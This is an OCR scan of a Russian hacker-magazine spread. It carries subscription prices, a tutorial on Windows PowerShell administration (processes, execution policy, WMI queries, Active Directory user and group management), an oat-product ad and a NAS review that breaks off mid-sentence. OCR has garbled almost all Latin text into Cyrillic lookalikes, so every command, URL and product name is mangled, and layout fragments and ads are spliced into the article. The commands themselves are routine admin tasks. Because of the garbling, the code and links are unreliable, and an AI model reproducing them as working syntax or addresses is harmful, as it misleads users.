К 9 * 

6 мес. 653, 40 руб. 
12 мес. 1188,00 руб. 



Цифровые 



ШИШ 




б мес. 670, 00 руб. 
12 мес. 1230,00 руб. 




Вышивают 

Бл кре<тиком 




1 6 мес. 432, 30 руб. 
13 мес. 572, 00 руб 

По спец акции на сайте! 




НаМаІ 




б мес. 670, 00 руб. 

1 2 мес. 840, 00 руб. 

По спец, акции на сайте! 



ОПВОДПО 




4 мес. 466, 00 руб. 
8 мес. 848, 00 руб. 



зкразз 




4 мес. 466, 00 руб. 
8 мес. 848, 00 руб. 



Мошгіаіп 

ВІке 




6 мес. 534, 60 руб. 
1 2 мес. 990, 00 руб. 




смйш 




6 мес. 890, 00 руб. 

1 2 мес. 1 630, 00 руб. 



КОМПЛЕКТЫ: 




6 мес. 2100,00 руб. 
1 2 мес. 3720, 00 руб. 



6 мес. 2052, 00 руб. 
1 2 мес. 3744, 00 руб. 



6 мес. 3150,00 руб. 
1 2 мес. 5580, 60 руб. 



(дате)іаші 

МЕДИА ДЛЯ ЭНТУЗИАСТОВ 

Реклама 

















ЗУИХАСК 



■ ■ УЛЬЯНАСМЕЛАЯ/СОРЕгаЗѴЫАСК.Ри/ 



Капитан 
РоѵѵегБМеІІ 
и администрирова- 
ние будущего 

ѴѴіпсІоѵѵз РоѵѵегБЬеІІ: мощный инструментарий для выполнения 
административных задач 

Долгое время визитной карточкой ѴѴіпсІоѵѵв служил графический интер- 
фейс, а желающим поработать в консоли приходилось довольствоваться 
весьма урезанным функционально стсі.ехе. Появление РоѵѵегЗЬеІІ 
с гибким языком сценариев изменило ситуацию клучшему. Используя 
его возможности, можнолегко выполнить практически любую задачу, 
возникающую перед администратором. 



ЗАЧЕМ АДМИНУ Р0ѴѴЕК5НЕІ.І.? Если наст- 
ройку при помощи графических утилит мож- 
но назвать наглядной, то консоль вырывает- 
ся вперед, когда говорят об автоматизации 
задач и обработке большого количества 
данных. Ранее админу, чтобы упростить 
себе работу, необходимо было использовать 
командные ВАТ-файлы, ѴВЗсгірі;, ІаѵаЗсгірі:, 
ѴѴіпсіоѵѵз Зсгірі; НозЦ Регі и прочие инстру- 
менты, позволяющие управлять системной 
информацией. Но одни ограничены по 
возможностям, другие сложны и неудобны, 
применение третьих (ѴВЗспри/іаѵаЗсгірі;) 
может снизить общий уровень безопаснос- 
ти системы. РоѵѵегЗЬеІІ (ранее — Мопасі), 
вышедший в 2006 году, лишен этих недо- 
статков. Он изначально объектно-ориен- 
тирован, вобрал в себя лучшие элементы из 
Регі, РНР, С# и использует все современные 
наработки Місгозоіт (в первую очередь, .ЫЕТ 
Егатеѵѵогк, объектами которой оперирует 
совершенно свободно) . Результат работы не 
нужно парсить, чтобы понять, что получи- 
лось; его опять можно обработать без какой- 



либо дополнительной подготовки. Именно 
поэтому принцип использования РоѵѵегЗЬеІІ 
несколько отличается от привычных 
юниксовых интерпретаторов. В оболочку 
встроено свыше 130 команд, позволяющих 
получить доступ к любому объекту файло- 
вой системы, реестра, сети, Асгіѵе Иігесгогу, 
а, используя предпочитаемый .ИЕТ-язык, 
можно создавать дополнительные коман- 
ды. Именно наличие большого количества 
командлетов (стсПеЩ — командных моду- 
лей, своего рода готовых мини-программ, 
реализующих отдельные операции) заметно 
упрощает выполнение часто используемых 
задач. 

Сейчас РоѵѵегЗЬеІІ встроен в ѴѴіп2к8/К2/ 
5е7еп и доступен как опциональный ком- 
понент для ѴѴіпХР5Р2/2кЗ/ѴІ8і:а. На мо- 
мент написания этих строк актуальны- 
ми были версии РоѵѵегЗЬеІІ 1.0 и 2.0 СТРЗ 
(Соттипйу ТесЬпоІо^у Ргеѵіеѵѵ 3), которую 
и будем использовать, так как до финально- 
го релиза уже рукой подать. Скачать СТРЗ 
можно с сайта МісгозоИ Г ^о.тісгозоіи.сот/ 



1ѵДіпк/?1лпкІР = 131969) . Для установки 
потребуется .ИЕТ Егатеѵѵюгк 2.0 (нужен 
для всех версий РоѵѵегЗЬеІІ, ^о.тісгозоІТ. 
сот/1ѵѵ1іпк/?1іпкіб = 100351) и .ИЕТ 

Егатеѵѵогк 3.5.1 (для работы І5Е — Іпіедгаіеб 
Зсгір1:іп§ Епѵігоптепі;, ^о.тісгозоіи.сот/ 
1ѵѵ1іпк/?1іпкіс[= 105983) . Для удаленного уп- 
равления понадобится ѴѴіпКМ 2.0 СТРЗ Г ^о. 
тісгозо!і:.сот/1ѵѵ1іпк/?1іпкіб= 131971) . Все 
эти компоненты ты найдешь на прилагаемом 
к журналу РѴР. 

НАЧИНАЕМ ИССЛЕДОВАНИЕ На первый 
взгляд синтаксис командной оболочки 
кажется немного запутанным, но в действи- 
тельности все понятно и логично. Названия 
командлетов стандартизированы, имена 
выглядят как «действие-объект». Так, чтобы 
получить данные объекта, используем дейс- 
твие «Сег-*», установить «Бег-*», остановить 
— «ЗНор-*», вывод — «От-*» и т.д. Список 
всех доступных команд можно просмотреть, 
выполнив «Сег-Соттапб». Для получения 
помощи набираем «Сег-Неір». К примеру, 
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просмотрим список процессов, рассортируем их по использованию 
процессорного времени в убывающем порядке и выберем 10 самых 
прожорливых: 

Р3> СеБ-Ргосезз I ЗогБ СРБ -Безсепсііпд I ЗеІесБ -РігзБ 10 

Все просто! Попробуем потушить самый жадный до СРІІ процесс: 

Р3> СеБ-Ргосезз I ЗогБ СРЮ -Безсепсііпд | ЗеІесБ -РігзБ 1 
I зБор-ргосезз 

Чтобы узнать, какие диски доступны, вводим: 

Р3> СеБ-РЗБгіѵе 



Новое 

в РоѵѵегЗЬеІІ 2.о 

РоѵѵегЗЬеІІ ѵ2 используется по умолчанию в ѴѴіп2к8К2 и ѴѴіп7. По 
сравнению с версией 1.0, оболочка получила 24 новых командлета 
и имеет ряд усовершенствований, о которых хотелось бы сказать 
отдельно (все они доступны в СТРЗ) : 

• Удаленное выполнение команд (РоѵѵегЗЬеІІ Кетопп^) — исполь- 
зуя технологию ѴѴіпКМ, РоѵѵегЗЬеІІ может выполнять команды 
сразу на нескольких системах и отслеживать результат (Сеі>Не1р 
АЬоии_Кетоі:іп§) ; 

• Выполнение в фоне (Васк^гоипсі боЪз) — возможность выполнять 
команды и скрипты в фоне (Сеі-Неір АЪоШ_Р51оЪ); 

• Новый АРІ, который позволяет встраивать РоѵѵегЗЬеІІ в другие 
продукты; 

• Новые переменные — пополнился набор переменных. Например, 



Обрати внимание, что в списке будут присутствовать и ветки реестра 
НКСИ и НКЬМ, к которым можно обратиться как к обычному диску: 

Р3> ссі НКБМ: 

РЗ НКБМ> 

Теперь можно перемещаться по выбранной ветке, просматривать, 
создавать и удалять объекты. Для РоѵѵегЗЬеІІ разработано большое 
количество командлетов, и если ты не хочешь повторно изобретать 
колесо, вполне естественно посмотреть на результаты работы дру- 
гих администраторов. Сообществом РоѵѵегЗЬеІІ создан репозитарий 
командлетов РозЬСобе Стбіещ Г роѵѵегзЬеІІсотппшЦу.ог^/ЗсгірЕз/ 
іаЫб/ЭІ/РеІаик.азрх) . который является неким аналогом Регі СРАН. 
Здесь можно найти решения практически на все случаи. Например, 



$соттапбЬіпеРагатеі:ег5 позволит получить аргументы командной 
строки; 

• Отладчик в консоли — теперь в скриптах, кроме 5еі-Р5РеЬи§, 
можно использовать еще ряд командлетов, устанавливать точки 
останова и продолжать отладку в пошаговом режиме (Сеі-Неір 
аЬоии_беЬи§§ег) ; 

• Многочисленные улучшения в работе с ѴѴМІ; 

• Зсгірі: Іпіегпагіопаіігагіоп — новая функция, позволяющая создать 
скрипт, который затем можно легко перевести на другой язык (Сеі:- 
Неір аЪоиі:_5сгіри_Іпіегпаі:іопа1І2аі:іоп) ; 

• Новые операторы (@), -боіп, -5рНи, упрощающие работы с тексто- 
выми строками; 

• ЗсгірііСтбІеЩ — возможность создания командлетов только с исполь- 
зованием кода РоѵѵегЗЬеІІ, без применения С# или Ѵізиаі Вазіс .Меи; 

• Командлет Ощ-СгібѴіеѵѵ позволяет выводить данные в виде табли- 
цы (Сеи-Неір От-СгібѴіеѵѵО ; 

• РоѵѵегЗЬеІІ Іпіе^гаіеб 5сгірі:іп§ ЕпѵігоптеЩ — графическая обо- 
лочка. 
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5ѴЫХАСК 




> ІПІО 

Некоторые команд- 
леты (Ѳеѣ-ѴѴі п Еѵепі;, 
Оеі-Соипіег, Ітрогі- 
Соипіег и другие] ра- 
ботаюттолько в новых 
версиях ѴѴі псіоѵѵз (от 
Ѵізіа]. 




НТТР://ѴѴѴШ 

■ г 

> Ііпкз 

Еще о РоѵѵегЗЬеи 
читай в статьях: 

• «Могучий шелл» 

— ѵѵѵѵ. хакер . 
ги/тадагіпе/ 
ха/09 1 /040/ 1 .азр . 

• «Меняем окна на 
консоль» — у ѵѵѵѵ. 
хакер.ги/тадагіпе/ 
ха/ 101/1 54/ 1 .азр . 

• Блог, посвящен- 
ный РоѵѵегЗЬеІІ: 

Ыодз.тзсіп.сопп/ 

РоѵѵегБЬеи . 

• Веб-страница 
ѴѴіпбоѵѵз Ро\л/ег5ЬеІ.І: 

ѵѵѵѵѵѵ.ппі егозой, сот/ 
роѵѵегзЬеи . 

• Страница ТесЬЫеі 
«Асііѵе Бігесіогу 
Асіппіпізігаііоп 
ѵѵііб ѴѴіпбоѵѵз 
РоѵѵегЗЬеіІ»: 
іесбпеі.тісгозоіі:. 
сот/еп-из/ІіЬга гу/ 
с!сІ378937[ѴѴ5.1 0). 
азрх . 

• Сообщество 
РоѵѵегЗЬеІЕ ѵѵѵѵѵѵ. 
роѵѵегзЬеи.сот . 



і !■ і Ц™- 
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СМОТРИМ СПИСОК ДОСТУПНЫХ 
ѴѴМІ-ОБЪЕКТОВ 



па !==&=: 13 

■ іі ІчягЗыІ, чі іи Іі пьіі і іНЬ 

... ... 




В Р0ѴѴЕК5НЕІ.І- Ѵ2 ПОЯВИЛАСЬ ГРАФИЧЕС- 
КАЯ ОБОЛОЧКА 



нужен еннфер на РоѵѵегЗЬеІІ? Нет ничего проще! Качаем 
с сайта ЫощгоЪЫебошг.сот/Зр^бв файл Сег-Раскег.рзі 
и запускаем: 

Р8> Сек-Раскек .рзі -Зкакізкісз 

Все параметры описаны внутри файла. Другой командлет 

Апа1ѵ2е-РаскеГ( Ъ1ощзаріеп.сот/іпс1ех.рІір/2008/08/14/ 
апаІѵге-раскеіі-геІоасІесО позволит получить детальную 
статистику по пакетам. 

По умолчанию выполнение сценариев в РоѵѵегЗЬеІІ за- 
прещено, поэтому не все команды удастся запустить. 
Просмотреть текущий статус политики выполнения 
можно командой: 

Р8> Сек-ЕхесикіопРоІісу 
АІІЗідпесІ 

Существует четыре типа политики: 



Полезные 

мелочи 

Если приходится часто вводить одинаковые команды, 
воспользуйся алиасами. Для начала взглянем на список 
предустановленных псевдонимов: 

Р3> дек-аііаз 



• Кезггісгесі — возможно выполнение отдельных команд, 
сценарии запрещены; 

• АПЗі^песі — разрешено выполнение подписанных сце- 
нариев, перед запуском запрашивается подтверждение; 

• КетоГеЗі^песі — похож на предыдущий, не запраши- 
вается выполнение сценариев, подписанных надежным 
издателем, не требуется подпись для локальных сцена- 
риев; 

• Иштезтсгес! — можно запускать неподписанные сцена- 
рии. 

Р8> 8ек-ЕхесикіопРо1ісу КетокеЗідпесІ 

РАБОТАЕМ С ѴѴМ 1-ОБЪЕКТАМ И Доступ в скриптах 
РоѵѵегЗЬеП к инструментарию управления ѴѴіпсіоѵѵз 
(ѴѴМІ, ѴѴіпсіоѵѵз Мапа^етепі: Іпзггитепгагіоп) дает почти 
безграничные возможности: можно получать, устанав- 
ливать, контролировать практически любые системные 
параметры. Для работы с ѴѴМІ в РоѵѵегЗЬеІІ используется 
командлет Сег-ѴѴтіОІцесі:. Чтобы узнать все допустимые 
параметры, запускаем его со знаком вопроса. Команда 
«Сег-ѴѴтіОіцесі: -Ьізі» выведет список всех доступных 
ѴѴМІ-объектов (приготовься, он будет большим). 
Аналогично, добавив «-Ілзі» при вызове определенно- 
го класса, увидим все возможные методы и свойства. 
Например, просмотрим список всех классов, связанных 
с сетевыми настройками: 

Р8> Сек-Ѵ/тіОЬдеск -Ьізк I ѵТЬеге ($_.паше -таксЪ. 
"пек " } 

И запросим настройки сетевых адаптеров: 



Например, вместо «Сег-Ргосезз» можно ввести просто 
«§рз». Задать свой алиас очень просто: 

Р3> 8ек-АІіаз 6 . Оек-Баке 

Теперь, чтобы вывести дату, достаточно набрать «б». Если в 
скриптах некоторый код повторяется несколько раз, имеет 
смысл использовать функции: 

кипскіоп <имя> {<код>} 

Очень удобно, что все функции, объявленные во время 
текущего сеанса консоли, запоминаются, и к ним можно 
обращаться по мере необходимости. 



Р8> Сек-ШііОЬд еск -Сіазз ЭДіпЗІЦ 

ЫекѵгогкАсІаркегСопкідигакіоп -Еіікег 

I РЕпаЫ еб=ТКІІЕ 

В результате получим таблицу с полной конфигурацией. 
Чтобы сохранить ее в файл, достаточно использовать 
стандартную функцию перенаправления, то есть прос- 
то добавить в конец команды «> пеГѵѵогк.Ихі». Кроме 
того, есть возможность сразу отформатировать вывод 
(Сег-Неір Ехрогг) . При вызове директиву «-Сіазз» можно 
опустить . Также надо помнить о клавише < ТаЬ > ; если ее 
нажать при вводе параметров, станет доступен список 
возможных вариантов. Иначе показываются все файлы 
текущего каталога. 
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ПОЛУЧАЕМ СПИСОК ОАО СМРІ.ЕТ5 



В скриптах часто нужен только один параметр из вызо- 
ва, поэтому сократим вывод, выбрав при помощи Зеіесг- 
Оіуесі один пункт, например ІР-адрес: 

Р8> СеЕ-ШііОЬд есЕ Мп32_ 

БеЕѵгогкАсІарЕегСопЕідигаЕіоп -ЕіІЕег 

ІРЕпаЬ1еб=ТРШС I ЗеІесЕ-ОЬд есЕ -РгорегЕу 

ІРАсісігезз 
ІРАсісігезз 



{192.168.1.58} 

{192.168.159.1} 

По умолчанию идет опрос локальной системы, но 
командлет Сег-ѴѴтіОЪіесі: принимает параметр 

«-СотриГегЫате», который используется, чтобы 
создать запрос к ѴѴМІ другой системы, находя- 
щейся в локальной сети. Точка после параметра 
(-СотріПегШте .) указывает на текущую машину. 
Например, произведем опрос свободного места на 
дисках в двух системах, и результат сохраним в файл 
формата С5Ѵ: 

Р8> $тасЫпез = @ ( " сотрі" , "сотрі" ) 

Р8> $(ЕогеасЪ. ( $тасМпе іп $таскіпез) 

»{ 

>>СеЕ-ШііОЬд есЕШ.п32_ЪодісаІБізк-СотрііЕегБате 
$тасМпе I 8е1есЕ-ОЬд есЕ -РгорегЕу ЕгееЗрасе I 
ЕхрогЕ-С8Ѵ с:\бізкз.сзѵ 
»}) 



В 




ОКНО Р0ѴѴЕП6Ш 



После ввода последней директивы нажимаем <ЕпИег> 
дважды. Данные будут выведены в байтах, что не очень 
наглядно, но их легко перевести, например, в гигабай- 
ты: 

Р8> ОеЕ-ѴйпіОЬзесЕ ѵ\гіп32_1одіса1с1ізк | ЗеІесЕ- 
Окд есЕ -РгорегЕу ЕгееЗрасе I % { $_. Егеезрасе/ІСВ 
} 

Теперь запросим список расшаренных сетевых папок: 

Р8> СеЕ-ШііОЕдесЕ Ѵ7іп32_8Ъ.аге 



Бате РаЕк 


БезсгірЕіоп 


С$ С:\ 


Стандартный общий ре 


сур с 




ІРС$ 


Удаленный ІРС 



Сегодня проблемой в организациях является несанкцио- 
нированное использование ІІ5В-устройств. И здесь нам 
может помочь РоѵѵегЗЬеІІ: 

Р8> СеЕ-ШііОЕПесЕ Мп32_Б8ВСопЕго11егБеѵісе I 

ЕогтаЕ-ЬізЕ АпЕесебепЕ , БерепбепЕ 

Используя ѴѴЬеге/ѴѴЬеге-ОЪіесі:, ЗттзСобе, ІР и другие 
операторы, можно отобрать только те параметры, кото- 
рые удовлетворяют определенным условиям. Проверя- 
ем, жив ли компьютер в сети, если да — получаем список 
процессов; иначе выводим сообщение: 



В чем работать с РошегЗЕеІІ? 

Командная строка (хост) РоѵѵегЗЬеІІ.ехе имеет простой интерфейс, и несколько неудобна при повседневном использо- 
вании и тестировании скриптов. При постоянной работе лучше подыскать альтернативные решения, благо их сегодня 
предостаточно. Например, бесплатный для некоммерческого использования РоѵѵегЗЬеІІРІиз (млллу.ібега.сот/РгобисЩ/ 
:г5ЬеШ или Роѵѵег 5Ье11 Апаіугег ( у.^ЬеПшоП.пеП . Хост Ро8ЬСоп8о1е (уѵѵ :обер1ех.сот/Ро5ЬСоп5о1е) , осно- 

ванный на графической подсистеме ѴѴРР (ѴѴіпбоѵуз Ргезешагіоп Роипбагіоп), обладает интересным режимом (^иакеМобе 
(Сег-ОиакеМобе), эмулирующим вид консоли популярной игры. Очень удобен редактор РоѵѵегСІЛ ( рошегчиі.оге) . 
созданный нашими соотечественниками, с автоматическим дополнением команд, хорошим отладчиком, возможнос- 
тью поиска командлетов в репозитарии РозЬСобе Стбіегз и многими другими функциями. Поклонники РАК наверняка 
оценят наличие плагина для этого файлового менеджера — РаШег ( собе . $юо $бе . сот/р /багпег) . 




> іпіо 

• РоѵѵегБЬеІІ — это 
расширяемая обо- 



лочка с интерфейсом 
командной строки и 
сопутствующий язык 
сценариев. Упрощает 
выполнение часто 
используемых задач, 
позволяет сократить 
время админист- 
рирования рабочих 
станций и серверов, 
а также обеспечивает 
возможность тонкой 
настройки компонен- 
тов ОС ѴѴіпбоѵѵз. 

• Сегодня РоѵѵегЗЬеЦ 
является частью ОС 
ѴѴіп2к8П2 и ѴѴі п 7 

и встроен в гра- 
фические консоли 
администрирования 
последних продуктов 
МісгозоК (например, 
ЕхсЬапде 2007 и 
Бузует Сепіег 2007]. 

• Интерфейс про- 
граммирования 
приложений А05І 
предназначен для 
доступа к службе 
Асбѵе 0 і гесіогу и 
позволяет создавать, 
изменять и удалять 
объекты в каталогах, 
выполнять поиск и 
множество других 
операций. 

• При использова- 
нии ОАО команды 
для работы с АО 
выглядят на порядок 
проще, а скрипты 
читабельнее. 

• ОАО командле- 
ты понадобятся в 
случае использова- 
ния некоторых 61)1 к 
РоѵѵегЗЬеІІ, в кото- 
рых имеется функция 
для работы с Асбѵе 
Оігесіогу (например, 
РоѵѵегСІЛ]. 
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РОѴѴЕРѲШ ПОЗВОЛЯЕТ ИСКАТЬ КОМАНДЛЕТЫ 
В Р05НССШЕ СМйЬЕТЗ ИЗ ОКНА РЕДАКТОРА 



Р8> $сошриРег = 192.168.1.1 

Р8> $ріпд = СеР-ШііОкдесИ: Шіп32_РіпдЗРаРиз -ІіІРег 

" Ас1с1гезз = ' $сотриН:ег ' " 

// статус "О" означает нормальное завершение 
Р3> ІГ ( $ріпд . ЗРаРизСосЗе -ед 0) 

»{ 

»СеР-8егѵісе 

»} 

»е1зе 

»{ 

» АсМ-СопРепП: " $сотриРег із пор аѵаіІаЫе" 

»} 

»} 

РАБОТАЕМ С АСТІѴЕ ОІРЕСТОРУ Используя командлеты, можно 
выполнять все операции с Аспіѵе Бігеспогу — создавать, удалять, 
изменять, просматривать свойства объектов, перемещать, пере- 
именовывать и восстанавливать объекты, управлять группами, 
ролями Р8МО, доменами и лесами, настраивать политики и мно- 
гое другое. Обращение к АБ происходит через АБ5І путем опроса 
пространства имен «ЗузПет.БігесПогуЗегѵісез» .ЫЕТ Ргатеѵѵюгк 
(подробнее об этом можно прочитать на страничке тзсіп. 
тісго50^.сот/ги-ги/1іЬгагу/5у5Гет.(іігесгогу5егѵісе5.а5рх^ Но 
при использовании АБ5І даже простые команды выглядят доволь- 
но пугающе для новичков (я уже не говорю о сложных конструк- 
циях) . Для примера зададим путь к контейнеру и просмотрим его 
свойства: 



• создавать, удалять, изменять и читать объекты пользователей, 
групп, компьютеров, управляемых аккаунтов служб и организаци- 
онных подразделений; 

• управлять свойствами аккаунтов: дата истечения, пароль и т.д.; 

• управлять членством в группах, получать список групп, в которые 
включен аккаунт; 

• управлять политикой паролей домена; 

• перемещать контроллеры домена между сайтами и получать ин- 
формацию о КД; 

• управлять политикой репликации пароля контроллера домена 
только для чтения; 

• управлять доменами и лесами, устанавливать функциональный 
уровень домена и леса. 

Чтобы установить АБ РоѵѵегЗЬеІІ в ѴѴіп7, надо инсталлировать К5АТ 
(МісгозоГп Кетоне Зегѵег Асітіпізпгапіоп Тооіз, иесІіпеи.тісгозоГп. 
сот/ш-т/ПЬгагу/сс730825.а5рх) . После чего АБ РоѵѵегЗЬеІІ мож- 
но загрузить прямо из меню «Программы и компоненты» (Тигп 
ѴѴіпсіоѵѵз Ееапигез оп ог оН — Кетоне Зегѵег Асітіпізпгапіоп Тооіз — 
Коіе Асітіпізпгапіоп Тоо1§ — АБ Б5 апб ЬБ5 Тооіз — Аспіѵе Бігеспогу 
РоѵѵегЗЬеІІ зпар-іп) . На сервере ѴѴіп2к8К2 нужный компонент ставит- 
ся еще проще: 

Р8> А<іс1-Шіп<іоѵ\гзРеаП:иге -Ыагпе "КЗАТ-АБ-РочѵегЗІіеІІ " 
- Іпс ІисІеАІ 1 ЗиЬРеаРиге 

Для загрузки модуля АБ РоѵѵегЗЬеІІ набираем: 

Р8> ішрогр-шосіиіе асріѵесіігесііогу 

К примеру, получим все КД текущего домена: 

Р8> СеР-АББотаіпСопРгоІІег -РіІРег { пате -Ііке } 

Также появились командлеты для работы с АБ от сторонних раз- 
работчиков. Очень популярны свободно распространяемые АБ 
РоѵѵегЗЬеІІ стсііепз (их еще называют С^АБ стсИеПз), разработанные 
Оиезп ЗоГпѵѵаге ( ѵѵѵѵѵѵ.диезп.сот/аспіѵегоіез-зегѵег/агтз.азрх) . В 

этом наборе имена командлетов составлены из стандартной пары 
«действие-объект». На первой позиции стоят все те же английс- 
кие глаголы Сен-, 5еп-, Ыеѵѵ-, Моѵе-, Кетоѵе-, Кепате- и так да- 
лее. На второй — описание объекта с префиксом (^АБ (-ОАББзег, 
-ОАБСотриНег, -С^АБСгоир, -(2АБОЪ]есп). Получить список до- 
ступных С^АБ командлетов очень просто: 

Р8> СеР-ОСотшапсі 

Если работаем под обычной учетной записью, подключимся к 
контроллеру домена в качестве администратора: 

Р8> $рм = геасІ-козИ: "Епкег раззтлгагсі" -АзЗесигеЗЕгіпд 
*********** 



Р8> $раРІі = [АБЗІ] "ЬБАР: / /0и=ЕезЕ0и , БС=ЕезЕсІотаіп , БС=1 
осаі " 

Р8> $раЕК I ЕогтаЕ-ЫзЕ * 

Чтобы создать новый объект, набираем: 

Р8> $изег = $раЕЪ. . СгеаРе ( ' изег ' , 1 сп= сіешо 1 ) 

В состав ѴѴіп2к8 входит утилита АБ5І Есіін, которая упрощает поиск 
параметров для написания сценариев, а в ѴѴіп2к8К2 и ѴѴіп7 (и только 
в них) доступен набор командлетов АБ РоѵѵегЗЬеІІ (Аспіѵе Бігеспогу 
Мобиіе Гог ѴѴіпсіоѵѵз РоѵѵегЗЬеІІ) , с помощью которого можно : 



Р8> СоппесЕ-ОАБЗегѵісе -зегѵісе ' ІосаІКозЕ 1 -ргоху 
-СоппесЕіопАссоипЕ 1 ЕезЕсІотаіпХасІтіпізЕгаЕог 1 

-СоппесЕіопРаззчлгагсІ $рѵ^ 

Для начала получим список пользователей и затем компьюте- 
ров: 

Р3> СеР-ОАБІІзег | Сек-МешЬег 
Р8> СеР-ОАБСошрикег 

Чтобы узнать информацию по отдельному пользователю и пара- 
метру, просто подставляем его в вызов: 
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'Иі.І'ЛІЗІ ЛІ}. ІЧПгШ. .ІІКІ ІН'ІМі.Мі.^іііі' 

РпяЬГлгміЕр: А чпип^г РпѵлггЯЬгН Сппяпіг 
кі гч'-ы^іі і іпуіш Ну . ^іѵгГ ■„Г.ѴіЧ іл ^^іуіг И 



Нилл’И іиі іі ы Цнп их 
Ь т р :п С о (Ѵ-Р1 г и г-п*л /Т оеіі Спгьд [г; 



РОЯМ 



I РеіМ : ■ Сстзаіе 



ХОСТ Р05НС0Ы50І.Е ДЛЯ РАБОТЫ С Р0ѴѴЕК5НЕІ.І. 



Р3> СеБ-С>АВБзег Ѵаз^а -РгорегБіез МападесЮЪ] есБз 

Теперь просмотрим список пользователей, которые не регистри- 
ровались 2 месяца и сохраним вывод в НТМЬ-файл: 

Р3> $1азБ2топБІіз = (СеБ-БаБе) . АББМопБкз ( -2 ) 

Р3> СеБ-()АВБзег -ІпсІиБесіРгорегБіез БазБЬодоп | 
ѵ/кеге { $_.1азБЬодоп -1е $1азБ2топБЪ.з } I ЗеІесБ 
ВізрІауБате, ЬазБЬодоп, АссоипБІзВізаЫесІ I ?{-поБ 
$_. АссоипБІзВізаЫесІ} I СопѵегБТо-НБті | ОиБ-Еііе с:\ 
герогБ . кВші 

Чтобы в отчет не попали отключенные учетные записи, в команде 
проконтролировали значение АссоітЧзБізаЫесІ. Знак «?» являет- 
ся алиасом «ѴѴЬеге-О^еси»; специальная переменная «$_», которая 
часто используется в скриптах РоѵѵегЗЬеІІ, указывает на текущий 
объект. 

Стоит отметить, атрибут ЬазгЬо^оп не реплицируется между кон- 
троллерами домена, поэтому если в сети их несколько, то это зна- 
чение следует получить с каждого КД. Получим список КД и затем 
опросим каждый на предмет ЬазгЬо^оп: 

Р3> СеВ-ОАВСотриВег -СошриВегКоіе ВотаіпСопВгоііег | 
Богеаск { 

(СеВ-С>АВБзег -Зегѵісе $_.Бате -ЗатАссоипВБате 



изегпате) . БазВБодоп . Ѵаіие 
} 

А теперь выберем всех пользователей из отдела Заіез, проживаю- 
щих в Москве, и укажем для них новый номер телефона: 

Р3> СеВ-ОАВБзег -СіВу Мозсом -ВерагВтепВ Заіез I ЗеВ- 
ОАББзег -РкопеБшпЪег 7 495-1111111 ' 

Создадим новую доменную учетную запись: 

Р3> Бем-С>АВБзег -паше ’изег 1 -РагепВСопВаіпег 1 0Б=ВезВ 
ОБ , ВС = ВезВс1отаіп , ВС = 1осаі ' -БзегРаззтлгагсІ 'Р@ззтлгагсІ' 

Чтобы отключить, включить или разблокировать учетную за- 
пись, следует использовать командлеты ЭізаЫе-ОАЭІІзег, ЕпаЫе- 
ОАЭИзег и ІІпІоск-ОАЭІІзег, соответственно. Также просто созда- 
вать новые объекты: 

Р3> Бе^-ОАВОЪз есВ -Буре ОгдапігаВіопБпіВ 

-РагепБСопБаіпег БезБзБошаіп . Іосаі -Баше НемОБ 

Теперь переместим в созданный контейнер ряд учетных запи- 
сей: 

Р3> СеБ-ОАББзег -БерагБшепБ Заіез I Моѵе-ОАБОЬз есБ -То 
БезБзБошаіп. Іосаі/Заіез 

Управление группами выглядит аналогично: 

Р3> СеБ-ОАБСгоирМешЬег Зсогріо\Мападегз I ѵікеге { 
$_.СіБу -ед 7 ЕкаБегіпЬигд 7 } | АББ-ОАБСгоирМешЬег 

Зсогріо\ЕкаБегіпЬигд_Мападегз 

Экспериментируя с РоѵѵегЗІіеІІ, можно легко ошибиться, поэтому 
при изменении объектов АЭ лучше запустить выполнение с клю- 
чом «-ѵѵііаілі» (что если). В этом случае вместо действительного 
изменения параметров скрипт выведет в консоль все, что он дол- 
жен сделать. 

ЗАКЛЮЧЕНИЕ Учитывая возможности, предоставляемые 
оболочкой РоѵѵегЗЬеІІ, и наличие огромного числа готовых ко- 
мандлетов, стоит потратить время на ее изучение. Это с лихвой 
окупится за счет автоматизации рутинных операций. И-Е 



Совет №4. 

Пей и ешь био-овсяные продукты ѴЕНЕ! 

Лето закончилось, проблемы начались — и их 
надо «ломать». Меньше холестерина и вред- 
ных веществ, больше витаминов и жизненной 
энергии - всё это, а также отличный вкус пода- 
рит тебе ѴЕІ±Е. Подробнее ты можешь позна- 
комиться с ѴЕІ1Е в сетевых супермаркетах и на 
ѵѵѵѵѵѵ.ѵеііеоаіз.сот 



V 

ѴЕНЕ* 
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Диски в стой 





N554000: 

Стоечный ЫА5 от Ыпкауз 





Технические характеристики 
Ыпквуз N554000 

>Жесткие диски: 

До 4 жестких дисков 5АТА (3,5”) с подде- 
ржкой «горячего» подключения 

> Функции РАШ: 

КАЮ 0,1,1 +5раге, 5, 5+5раге, 1 0, 3 ВО О 
Поддержка «виртуализации» КАЮ (требу- 
ется, как минимум, один N556000/6100 в 
сети] 

Бэкап КАЮ-массивов на другой ЫА5 по 
сети 



> Методы доступа: 

5МВ/СІР5, N55, РТР/РТР5 

> Безопасность: 

Поддержка шифрования файлов с использо- 
ванием алгоритма АЕ5 256 
V^АN (802.1 ц/р) 

Поддержка АСЕ 
Фильтрация МАС/ІР-адресов 

> Интерфейсные порты: 

2 порта АЮХ (поддержка Ю 5 В -бІазЬ для бэка- 
па конфигурации] 



1 портІІР5-ІІ5В (только АРС 5тагІ-11Р5) 

1 коннектор КР5Б (для подключения резерв- 
ного источника питания] 

> Особенности: 

512 Мб внутренней НазЬ-памяти 
Предустановлена ОС на базе Ыпих 2.6 
Файловая система ХР5 
Механизм блокировки файлов 
Возможность использования 
нескольких NА5-систем в качестве одной 
ЮР5] 

> Функции управления: 

Управление через НТТР/НТТР5 
Мониторинг (5NМРѵЗ] 

> Охлаждение: 

Вентиляторы стермальными сенсорами 

> Питание: 

Блокпитания мощностью 150 Вт 

> Исполнение: 

Для установки в стойку 19” (440 х 44 х 420 мм) 

> Гарантийное обслуживание: 

Срок гарантии: 2 года (1 год на вентиляторы 
и блок питания] 



Стоечная 1МА5-система начального уровня 
N554000 отлично подходит для хранения кон- 
фиденциальной информации и любых других 
данных небольшой рабочей группы или ма- 
лого офиса. Она поддерживает до 4 5АТА-дис- 
ков, объединенных в КАГО-массив уровня 0, 1, 
1 + 5раге, 5, 5 + 5раге, 10 или ЛЮБ. 

Ключевая особенность системы — в наличии 
сразу нескольких механизмов обеспечения 
доступности и масштабируемости данных. 
N554000 позволяет объединять несколько ^5- 
систем в одну с использованием файловой сис- 
темы БР5 (БізтЪіПесІ Рііе 5у5Гет), поддержива- 
ет механизм «виртуализации» КАГО-массивов, 
при котором один массив «размазывается» по 
